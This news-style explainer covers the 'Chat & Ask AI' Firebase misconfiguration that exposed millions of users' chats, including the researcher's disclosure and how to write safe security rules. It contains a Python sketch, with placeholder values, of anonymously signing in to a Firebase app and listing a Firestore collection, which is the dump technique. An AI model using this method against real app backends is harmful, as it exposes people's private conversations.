The popular smartphone app "Chat & Ask AI" suffered a serious privacy failure, exposing roughly 300 million private messages from more than 25 million users. The app, available on Google Play and the Apple App Store, lets users chat with AI models such as ChatGPT, Claude, and Gemini. The vulnerability was discovered by an independent security researcher known as Harry, who shared the findings with 404 Media.
The problem was not a hacker attack but a simple configuration mistake. The app stores its data in Google Firebase, a cloud backend service. Firebase databases are secure by default, but developers must write security "rules" to control who can access what. In this case those rules were effectively left open, much like leaving your front door unlocked.
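For context, Firestore's "locked mode" default denies everything until a developer writes something more permissive; this is the standard template Firebase generates:

```
rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    match /{document=**} {
      // Locked mode: nobody can read or write until rules are relaxed.
      allow read, write: if false;
    }
  }
}
```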
Anyone who completed a basic Firebase sign-in could pose as an "authenticated" user and read the entire backend database. Harry was able to access millions of users' chat histories. The exposed data included timestamps, user preferences, the AI model each user had selected, and custom chatbot names.
Based on a sample of 60,000 users and one million messages, the breach affected at least half of the app's claimed 50 million users. No passwords or financial information were exposed, but the messages themselves were deeply personal. Users confide in these AI bots as if they were close friends: the leaked logs included requests for hacking advice, methamphetamine recipes, painless self-harm techniques, and help writing suicide notes.
This highlights the danger of "wrapper" apps: thin user interfaces that resell powerful AI technology from OpenAI or Google without matching their security.
Here is how Firebase works: data is kept in cloud storage or in real-time databases. The default rules restrict reads and writes and require authentication. Developers write rules in a simple dedicated language, for example:

```
rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    match /{document=**} {
      allow read, write: if request.auth != null;
    }
  }
}
```

In "Chat & Ask AI", the rules effectively permitted public reads: `allow read: if true;`. Data could be dumped with the Firebase SDK or a quick curl command. After Harry informed the developers, the database was secured. This is not an unusual story.
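The dump path can be sketched with plain HTTP. Firebase's public REST endpoints let anyone holding an app's API key (which ships inside every client binary and is public by design) create an anonymous session and then query Firestore. The project ID, API key, and `chats` collection below are hypothetical placeholders, not the app's real values; this is a minimal sketch, not a reconstruction of the researcher's exact method.

```python
# Sketch of probing a misconfigured Firebase backend over REST.
# PROJECT_ID, API_KEY, and the "chats" collection are hypothetical.
import json
import urllib.request

PROJECT_ID = "example-chat-app"  # placeholder
API_KEY = "AIzaSy-EXAMPLE"       # placeholder; Firebase API keys are not secrets

def signup_url(api_key: str) -> str:
    # Identity Toolkit endpoint for anonymous sign-up: POSTing
    # {"returnSecureToken": true} here yields an ID token with no password.
    return ("https://identitytoolkit.googleapis.com/v1/"
            f"accounts:signUp?key={api_key}")

def firestore_list_url(project_id: str, collection: str) -> str:
    # Firestore REST endpoint that lists the documents in a collection,
    # provided the security rules let the caller read it.
    return ("https://firestore.googleapis.com/v1/projects/"
            f"{project_id}/databases/(default)/documents/{collection}")

def dump_collection(project_id: str, collection: str, id_token: str) -> dict:
    # With `allow read: if true;` (or any rule satisfied by an anonymous
    # token), this request returns the raw documents.
    req = urllib.request.Request(
        firestore_list_url(project_id, collection),
        headers={"Authorization": f"Bearer {id_token}"},
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)

if __name__ == "__main__":
    # Only print the endpoints; the project and key above are not real.
    print(signup_url(API_KEY))
    print(firestore_list_url(PROJECT_ID, "chats"))
```

The point of the sketch is that "authenticated" is a very low bar: an anonymous sign-up satisfies `request.auth != null`, so rules must check *authorization*, not mere authentication.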
Firebase misconfigurations have exposed data before, including apps such as Fortnite trackers. Wrapper apps rush to market and skip security audits. Developers should deploy Firebase rules in locked (production) mode and test them before release, using tools such as the Firebase Security Rules Simulator.
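By contrast, a rule that scopes each document to its owner would have blocked the dump. This is a sketch assuming chats are stored under a hypothetical `users/{userId}/chats` path:

```
rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    // Each user may read and write only their own chat documents.
    match /users/{userId}/chats/{chatId} {
      allow read, write: if request.auth != null
                         && request.auth.uid == userId;
    }
  }
}
```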
Run routine scans using Firebase's audit logs or services like CloudQuery, and encrypt critical information at rest. For users: don't divulge sensitive information to third-party AI apps.
Check app reviews and privacy policies before installing. For private conversations, use OpenAI's or Google's official apps. This breach is a warning to the AI boom: security must always come first. Developers need to treat configuration as a top priority, and users should think twice about which apps they trust.